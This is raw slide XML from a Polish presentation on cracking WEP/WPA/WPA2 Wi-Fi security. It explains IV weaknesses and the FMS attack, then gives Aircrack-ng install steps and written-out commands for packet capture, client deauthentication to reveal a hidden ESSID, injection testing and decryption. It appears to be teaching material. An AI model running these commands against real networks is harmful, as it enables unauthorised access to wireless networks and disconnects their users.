                </a:solidFill>
              </a:rPr>
              <a:t>WEP/WPA/WPA2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99FF33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068960"/>
            <a:ext cx="35528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Dodatkowe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20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nn-NO" sz="20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airmon-ng start wlan0 [nr kanału]</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="20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l-PL" sz="20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20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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="20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-9 &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL" sz="20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20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airdecap-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="20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-w klucz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="20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nazwapliku.cap</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" dirty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Dziękujemy za uwagę!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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rgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pakiet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> służy do testowania sieci bezprzewodowych pod kątem zabezpieczeń. Za jego pomocą można przechwytywać pakiety i odzyskiwać z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>klucze.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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Słabość WEP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rgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kiepska implementacja wektora inicjalizującego</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeśli zrobi się XOR dwóch pakietów o tym samym wektorze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inicjalizacyjnym (mający identyczny klucz RC4) będzie się w stanie obliczyć klucz WEP</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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Instalacja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sudo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apt-get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install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build-essential</a:t>
            </a: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wget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http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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tar -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zxvf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aircrack-ng-1.2-beta1.tar.gz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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cd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aircrack-ng-1.2-beta1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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make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install</a:t>
            </a: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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Instalacja ze wsparciem CUDA:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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svn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co http://svn.aircrack-ng.org/branch/aircrack-ng-cuda/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aircrack-ng-cuda</a:t>
            </a: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cd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aircrack-ng-cuda</a:t>
            </a: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CUDA=true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make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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make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CUDA=true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sqlite=true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unstable=true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install</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1400" dirty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rgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nie wszystkie chipsety kart sieciowych wspierają możliwości pakietu. Pod tym adresem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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.aircrack-ng.org/doku.php?id=compatibility_drivers</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="24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pl-PL" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="99FF33"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>można znaleźć listę tych wspieranych w pełni bądź częściowo.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400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Wektor inicjalizujący (IV)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pl-PL" dirty="0" smtClean="0"/>
              <a:t>Liczba stanowiąca pierwszy blok w wiązanych trybach szyfrów blokowych</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inicjalizujący jest zazwyczaj jawny, tj. jego znajomość nie ułatwia w żaden sposób pracy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kryptoanalitykowi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> próbującemu złamać wiadomość. W praktyce podczas przesyłania długiej wiadomości zaszyfrowanej w trybie korzystającym z IV ten ostatni jest po prostu dołączony do kryptogramu w postaci jawnej tak, by odbiorca mógł poprawnie odszyfrować tekst.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bardzo często bezpieczeństwo zależy w dużym stopniu od niepowtarzalności i nieprzewidywalności IV. Wynika stąd, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>że IV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> powinno być generowane w sposób losowy i kryptograficznie bezpieczny.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL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99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atak FMS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>
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fluhrera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mantina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shamira</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(FMS) jest to najbardziej popularna forma ataku na protokół WEP. Pozwala atakującemu na odzyskanie klucza RC4 z zaszyfrowanego strumienia poprzez dużą liczbę wiadomości w strumieniu. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Podstawą ataku FMS jest wykorzystanie słabych wektorów </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inicjalizyjących</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (IV) używanych w RC4. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL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99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Otrzymywanie ukrytego ESSID (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Service Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99FF3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airodump-ng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&lt;nazwa interfejsu&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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airodump-ng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-c &lt;numer kanału&gt; --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bssid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&lt;adres mac routera&gt; -a wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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aireplay-ng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-0 &lt;liczba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pakietow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&gt; -a &lt;mac adres routera&gt; -c &lt;mac adres klienta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ktorego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 chcemy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" err="1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odlaczyc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;nazwa naszego interfejsu&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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l-PL" sz="1400" dirty="0" smtClean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l-PL" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99FF33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1079</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Pokaz na ekranie (4:3)</PresentationFormat>
  <Paragraphs>116</Paragraphs>
  <Slides>21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Slajd 1</vt:lpstr>
      <vt:lpstr>Jak złamać zabezpieczenia   WEP/WPA/WPA2?</vt:lpstr>
      <vt:lpstr>Slajd 3</vt:lpstr>
      <vt:lpstr>Słabość WEP</vt:lpstr>
      <vt:lpstr>Instalacja</vt:lpstr>
      <vt:lpstr>Slajd 6</vt:lpstr>
      <vt:lpstr>Wektor inicjalizujący (IV)</vt:lpstr>
      <vt:lpstr>Atak FMS</vt:lpstr>
      <vt:lpstr>Otrzymywanie ukrytego ESSID (Extended Service Set Identification)</vt:lpstr>
      <vt:lpstr>Filtrowanie po adresach mac.</vt:lpstr>
      <vt:lpstr>ARP</vt:lpstr>
      <vt:lpstr>Zasady działania ARP</vt:lpstr>
      <vt:lpstr>ARP Request Replay Attack</vt:lpstr>
      <vt:lpstr>Sieć z zabezpieczeniem WEP  (z podłączonymi klientami)</vt:lpstr>
      <vt:lpstr>KoreK chopchop attack</vt:lpstr>
      <vt:lpstr>IP fragmentation attack</vt:lpstr>
      <vt:lpstr>PRGA</vt:lpstr>
      <vt:lpstr>Sieć z zabezpieczeniem WEP  (bez podłączonych klientów)</vt:lpstr>
      <vt:lpstr>Sieć z zabezpieczeniem WPA</vt:lpstr>
      <vt:lpstr>Dodatkowe</vt:lpstr>
      <vt:lpstr>Dziękujemy za uwagę!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Windows User</dc:creator>
  <cp:lastModifiedBy>Jaras</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-06-04T09:01:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-06-11T16:53:25Z</dcterms:modified>
</cp:coreProperties>
</file>